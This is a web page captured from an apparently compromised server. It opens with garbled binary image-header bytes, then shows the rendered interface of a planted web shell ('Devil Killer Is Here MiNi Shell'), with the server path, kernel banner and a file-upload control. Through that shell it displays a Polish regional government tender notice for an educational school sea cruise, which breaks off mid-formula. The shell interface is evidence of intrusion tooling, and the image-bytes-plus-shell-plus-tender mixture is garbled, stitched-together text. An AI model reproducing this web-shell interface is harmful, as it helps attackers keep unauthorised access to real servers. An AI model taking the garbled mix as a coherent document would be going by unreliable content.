JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20230309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20230309/0012870601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zorganizowanie i przeprowadzenie edukacyjnego rejsu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Województwo Pomorskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191674836</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Okopowa 21/27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-810</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pomorskie.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.pomorskie.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zorganizowanie i przeprowadzenie edukacyjnego rejsu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7eb822f5-bdaa-11ed-b311-9aae6ad31be8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00128706</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00041364/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.13 Tygodniowy rejs dalekomorski (projekt &#34;Pomorskie Żagle Wiedzy - wsparcie regionalne&#34;)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt &#34; Pomorskie Żagle Wiedzy - wsparcie regionalne&#34; współfinansowane ze środków UE w ramach poddziałania 3.2.1 Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014- 2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pomorskie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pomorskie</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w<br/>języku polskim, w formie elektronicznej, za pośrednictwem Platformy zakupowej.<br/>2. Komunikacja między Zamawiającym, a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje,<br/>przekazywane winny być za pośrednictwem Platformy zakupowej za pomocą formularza „Wyślij wiadomość do Zamawiającego”.<br/>3. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem Platformy zakupowej poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego” po których pojawi się<br/>komunikat, że wiadomość została wysłana do Zamawiającego.<br/>4. Zamawiający dopuszcza, awaryjnie, komunikację za pośrednictwem poczty elektronicznej: zamowienia@pomorskie.eu<br/>5. Zamawiający będzie przekazywał Wykonawcom informacje elektronicznie za pośrednictwem Platformy zakupowej. Informacje,<br/>zawiadomienia, zmiany, odpowiedzi - Zamawiający będzie zamieszczał na Platformie zakupowej. Korespondencja, której zgodnie z<br/>obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana elektronicznie za pośrednictwem Platformy<br/>zakupowej do konkretnego Wykonawcy, na adres mailowy wskazany w ofercie Wykonawcy.<br/>6. Wykonawca, jako podmiot profesjonalny, ma obowiązek sprawdzania komunikatów i wiadomości przesłanych przez<br/>Zamawiającego, bezpośrednio na Platformie zakupowej oraz na poczcie elektronicznie – pod adresem wskazanym w ofercie, gdyż<br/>system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>7. Zamawiający wskazuje niezbędne wymagania techniczne umożliwiające pracę na Platformie zakupowej, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 256 kb/s;<br/>2) przeglądarka internetowa EDGE, Chrome lub FireFox w najnowszej dostępnej wersji, z włączoną obsługą języka Javascript,<br/>akceptująca pliki typu „cookies”.<br/>Ponadto Zamawiający informuję, że występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty lub wniosku<br/>do ilości 10 plików lub spakowanych folderów (pliki można spakować programem do archiwizacji np. 7-Zip) przy maksymalnej<br/>wielkości 150 MB.<br/>8. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z Platformy zakupowej określone w Regulaminie zamieszczonym na stronie internetowej Platformy<br/>pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do aktualnej Instrukcji składania ofert/wniosków dostępnej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>9. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z Platformy zakupowej<br/>w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie<br/>oferty w zakładce „Wyślij wiadomość do Zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i<br/>nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy<br/>Pzp.<br/>10. Zamawiający informuje, że instrukcje korzystania z Platformy zakupowej, dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>Platformy zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje .<br/>11. W zakresie kwestii nieuregulowanych niniejszą SWZ obowiązują przepisy ustawy Pzp oraz Rozporządzenia Prezesa Rady<br/>Ministrów z dnia z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UEL 119 z 4.5.2016 r., str. 1), dalej „RODO”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Zarząd Województwa Pomorskiego<br/>z siedzibą przy ul. Okopowej 21/27, 80-810 Gdańsk, tel. 58 326 87 58 adres e-mail: zamowienia@pomorskie.eu<br/>W sprawach związanych z Pani/Pana danymi osobowymi proszę kontaktować się<br/>z Inspektorem Ochrony Danych (IOD): e-mail: iod@pomorskie.eu<br/>2. Pani/Pana dane osobowe przetwarzane będą w celu przeprowadzenia postępowania<br/>i udzieleniu zamówienia, prowadzenia dokumentacji księgowo-podatkowej, archiwizacji danych, dochodzenia roszczeń lub obrony<br/>przed roszczeniami.<br/>3. Podstawą przetwarzania danych osobowych jest:<br/>1) ustawa z 11 września 2019 r. – Prawo zamówień publicznych;<br/>2) ustawa z 27 sierpnia 2009 r. o finansach publicznych;<br/>3) ustawa z 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach;<br/>4) art. 6 pkt.1 lit. c RODO<br/>– przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze.<br/>4. Odbiorca lub kategorie odbiorców: podmioty upoważnione na podstawie zawartych umów powierzenia oraz uprawnione na mocy<br/>obowiązujących przepisów prawa, w szczególności osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania<br/>na podstawie art. 18 oraz art. 74–76 ustawy Pzp. Zasada jawności ma zastosowanie do wszystkich danych osobowych, z wyjątkiem<br/>danych, o których mowa w art. 9 ust. 1 RODO (szczególna kategoria danych).<br/>5. Pani/Pana dane osobowe będą przechowywane do czasu zakończenia obowiązującego nas okresu archiwizacji</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">6. Posiada Pani/Pan prawo:<br/>1) żądania dostępu do danych; w przypadku gdy wykonanie tego obowiązku, wymagałoby niewspółmiernie dużego wysiłku,<br/>Zamawiający może, zgodnie z art. 75 ustawy Pzp, żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>2) żądania sprostowania lub uzupełnienia danych osobowych; zgodnie z art. 76 ustawy Pzp wykonanie tego obowiązku nie może<br/>naruszać integralności protokołu postępowania oraz jego załączników;<br/>3) usunięcia danych w przypadku, gdy dane osobowe nie są już niezbędne do celów,<br/>w których zostały zebrane, lub w inny sposób przetwarzane;<br/>4) żądania ograniczenia przetwarzania danych osobowych; zgodnie z art. 74 ust. 3 PZP wykonanie tego obowiązku nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenie postępowania o udzielenie zamówienia.<br/>7. Przysługuje Pani/Pan prawo do wniesienia skargi do organu nadzorczego, tj. Urzędu Ochrony Danych Osobowych ul. Stawki 2,<br/>00-913 Warszawa.<br/>8. Pani/Pana dane osobowe nie będą poddawane zautomatyzowanemu podejmowaniu decyzji, w tym również profilowaniu.<br/>9. Pani/Pana dane osobowe nie będą przekazywane do państw trzecich.<br/>10. Podanie danych osobowych jest wymogiem ustawowym określonym w przepisach PZP, związanych z udziałem w postępowaniu<br/>o udzielenie zamówienia; konsekwencje niepodania określonych danych wynikają z PZP.<br/>11. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z<br/>wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAZ-Z.272.24.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie 7-dniowego, edukacyjnego rejsu dalekomorskiego dla maksymalnie 40 osób:<br/>a) 36 uczniów szkoły ponadpodstawowej – uczestników Konkursu Po Morskie Żagle Wiedzy zorganizowanego w ramach projektu „Pomorskie Żagle Wiedzy – wsparcie regionalne” (RPPM.03.02.01-22-0001/21), zwanego dalej „Projektem”, współfinansowanego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020, oraz<br/>b) 4 nauczycieli – opiekunów uczestników rejsu.<br/>2) Uczestnikami rejsu będą osoby, które ukończyły 15 lat.<br/>Wykonawca zapewni odpowiednią kadrę – minimum 4 osoby, posiadającą wymagane kwalifikacje, tj.:<br/>a) patent jachtowego sternika morskiego;<br/>b) ważny certyfikat STCW lub równoważny;<br/>Przedmiot zamówienia zostanie przeprowadzony w okresie pomiędzy 12.04.2023 r. a 30.04.2023 r.:<br/>Wykonawca w ofercie zobowiązany jest podać termin realizacji zamówienia tj. maksymalnie 10 dni, w tym wymagane jest 7 dni rejsu oraz maksymalnie 3 dni transportu z Gdańska do portu zaokrętowania i powrotu do Gdańska.Przedmiot zamówienia zostanie przeprowadzony na akwenie gwarantującym bezpieczne i komfortowe warunki realizacji programu edukacyjnego.<br/>4) Przedmiot zamówienia zostanie przeprowadzony na statku zapewniającym możliwość jednorazowego przewozu min. 40 osób (nie wliczając załogi stałej) wraz z ich bagażem osobistym, przy czym statek powinien posiadać liczbę miejsc noclegowych wystarczającą do zakwaterowania 36 uczniów i 4 nauczycieli (nie dopuszcza się kwaterowania osób różnej płci w tych samych kabinach).<br/>5) Statek powinien być zarezerwowany na wyłączność podczas realizacji przedmiotu zamówienia.<br/>Szczegółowy opis przedmiotu zamówienia określony został w Opisie Przedmiotu Zamówienia (stanowiącym załączniki nr<br/>1 do SWZ) oraz projekcie Umowy (stanowiącym załączniki do nr 3 SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60651000-6 - Wynajem jednostek pływających wraz z załogą</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79960000-1 - Usługi fotograficzne i pomocnicze</p> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wszystkie oferty niepodlegające odrzuceniu oceniane będą na podstawie kryterium oceny ofert.<br/>Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami oceny ofert:<br/>1. Sposób przyznawania punktów:<br/>Liczba punktów danej oferty będzie stanowiła sumę punktów przyznanych w każdym z kryteriów, zgodnie z wzorem:<br/>PO = PK1 + PK2 + PK3 + PK4 + PK5<br/>PO – liczba punktów przyznanych ofercie<br/>PK1 – liczba punktów dla kryterium „Cena”<br/>PK2 – liczba punktów dla kryterium „Doświadczenie załogi ”<br/>PK3 – liczba punktów dla kryterium „ Doświadczenie Kapitan”<br/>PK4 – liczba punktów dla kryterium „Dodatkowa wycieczka edukacyjna”<br/>PK5 – liczba punktów dla kryterium „Dodatkowe elementy programu<br/><br/>Ze względu na ograniczona ilość znaków dopuszczaną przez platformę e- zamówienia. Szczegółowy sposób przyznawania punktów i kryterium oceny ofert dla części 1 określony jest w rozdziale XXI lit. A SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Załogi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">18</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kapitana</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">17</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowa Wycieczka Edukacyjna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe elementy programu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie jednodniowego edukacyjnego rejsu po Zatoce Gdańskiej dla maksymalnie 50 osób (uczniowie szkół podstawowych i nauczyciele – opiekunowie szkolnej grupy projektowej) – uczestników Konkursu projektów uczniowskich zorganizowanego w ramach projektu „Pomorskie Żagle Wiedzy – wsparcie regionalne” (RPPM.03.02.01-22-0001/21), zwanego dalej „Projektem”, współfinansowanego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020.Celem rejsu jest podniesienie kompetencji kluczowych i umiejętności uniwersalnych uczniów. Przedmiot zamówienia zostanie przeprowadzony w okresie pomiędzy 4.09.2023 r. a 17.09.2023 r.<br/>Kadra<br/>Wykonawca zapewni odpowiednią kadrę – minimum 1 osobę, posiadającą wymagane kwalifikacje, tj.:<br/>a) patent jachtowego sternika morskiego;<br/>b) ważny certyfikat STCW lub równoważny<br/>Szczegółowy opis przedmioty zamówienia został określony, w Opis Przedmiotu Zamówienia ( stanowiący załącznik nr.2 do SWZ) oraz w projekcie umowy ( stanowiącej załącznik nr.3 do SWZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60651000-6 - Wynajem jednostek pływających wraz z załogą</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79960000-1 - Usługi fotograficzne i pomocnicze</p> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wszystkie oferty niepodlegające odrzuceniu oceniane będą na podstawie kryterium oceny ofert.<br/>2. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami oceny ofert:<br/>Sposób przyznawania punktów:<br/>Liczba punktów danej oferty będzie stanowiła sumę punktów przyznanych w każdym z kryteriów, zgodnie z wzorem:<br/>PO = PK1 + PK2 + PK3<br/>PO – liczba punktów przyznanych ofercie<br/>PK1 – liczba punktów dla kryterium „Cena”<br/>PK2 – liczba punktów dla kryterium „Dodatkowa wycieczka edukacyjna”<br/>PK3 – liczba punktów dla kryterium „Dodatkowy element programu ”<br/>2.1 Dla kryterium „Cena” – PK1<br/>PK1 = [CN / CR x 60%] x 100<br/>PK – liczba punktów dla kryterium 